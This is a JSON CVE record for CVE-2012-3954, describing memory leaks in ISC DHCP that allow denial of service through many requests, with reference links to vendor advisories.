|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||
Date Public ?
2012-07-24 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T20:21:04.079Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "1027300",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1027300"
},
{
"name": "DSA-2516",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "http://www.debian.org/security/2012/dsa-2516"
},
{
"name": "RHSA-2012:1141",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
},
{
"name": "MDVSA-2012:116",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA",
"x_transferred"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
},
{
"name": "openSUSE-SU-2012:1006",
"tags": [
"vendor-advisory",
"x_refsource_SUSE",
"x_transferred"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
},
{
"name": "MDVSA-2012:115",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA",
"x_transferred"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
},
{
"name": "DSA-2519",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "http://www.debian.org/security/2012/dsa-2519"
},
{
"name": "USN-1519-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU",
"x_transferred"
],
"url": "http://www.ubuntu.com/usn/USN-1519-1"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.isc.org/article/AA-00737"
},
{
"name": "GLSA-201301-06",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO",
"x_transferred"
],
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"name": "54665",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/54665"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2012-07-24T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Multiple memory leaks in ISC DHCP 4.1.x and 4.2.x before 4.2.4-P1 and 4.1-ESV before 4.1-ESV-R6 allow remote attackers to cause a denial of service (memory consumption) by sending many requests."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-11-25T19:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "1027300",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1027300"
},
{
"name": "DSA-2516",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "http://www.debian.org/security/2012/dsa-2516"
},
{
"name": "RHSA-2012:1141",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
},
{
"name": "MDVSA-2012:116",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
},
{
"name": "openSUSE-SU-2012:1006",
"tags": [
"vendor-advisory",
"x_refsource_SUSE"
],
"url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
},
{
"name": "MDVSA-2012:115",
"tags": [
"vendor-advisory",
"x_refsource_MANDRIVA"
],
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
},
{
"name": "DSA-2519",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "http://www.debian.org/security/2012/dsa-2519"
},
{
"name": "USN-1519-1",
"tags": [
"vendor-advisory",
"x_refsource_UBUNTU"
],
"url": "http://www.ubuntu.com/usn/USN-1519-1"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.isc.org/article/AA-00737"
},
{
"name": "GLSA-201301-06",
"tags": [
"vendor-advisory",
"x_refsource_GENTOO"
],
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"name": "54665",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/54665"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-3954",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple memory leaks in ISC DHCP 4.1.x and 4.2.x before 4.2.4-P1 and 4.1-ESV before 4.1-ESV-R6 allow remote attackers to cause a denial of service (memory consumption) by sending many requests."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "1027300",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1027300"
},
{
"name": "DSA-2516",
"refsource": "DEBIAN",
"url": "http://www.debian.org/security/2012/dsa-2516"
},
{
"name": "RHSA-2012:1141",
"refsource": "REDHAT",
"url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
},
{
"name": "MDVSA-2012:116",
"refsource": "MANDRIVA",
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
},
{
"name": "openSUSE-SU-2012:1006",
"refsource": "SUSE",
"url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
},
{
"name": "MDVSA-2012:115",
"refsource": "MANDRIVA",
"url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
},
{
"name": "DSA-2519",
"refsource": "DEBIAN",
"url": "http://www.debian.org/security/2012/dsa-2519"
},
{
"name": "USN-1519-1",
"refsource": "UBUNTU",
"url": "http://www.ubuntu.com/usn/USN-1519-1"
},
{
"name": "https://kb.isc.org/article/AA-00737",
"refsource": "CONFIRM",
"url": "https://kb.isc.org/article/AA-00737"
},
{
"name": "GLSA-201301-06",
"refsource": "GENTOO",
"url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
},
{
"name": "54665",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/54665"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-3954",
"datePublished": "2012-07-25T10:00:00.000Z",
"dateReserved": "2012-07-11T00:00:00.000Z",
"dateUpdated": "2024-08-06T20:21:04.079Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}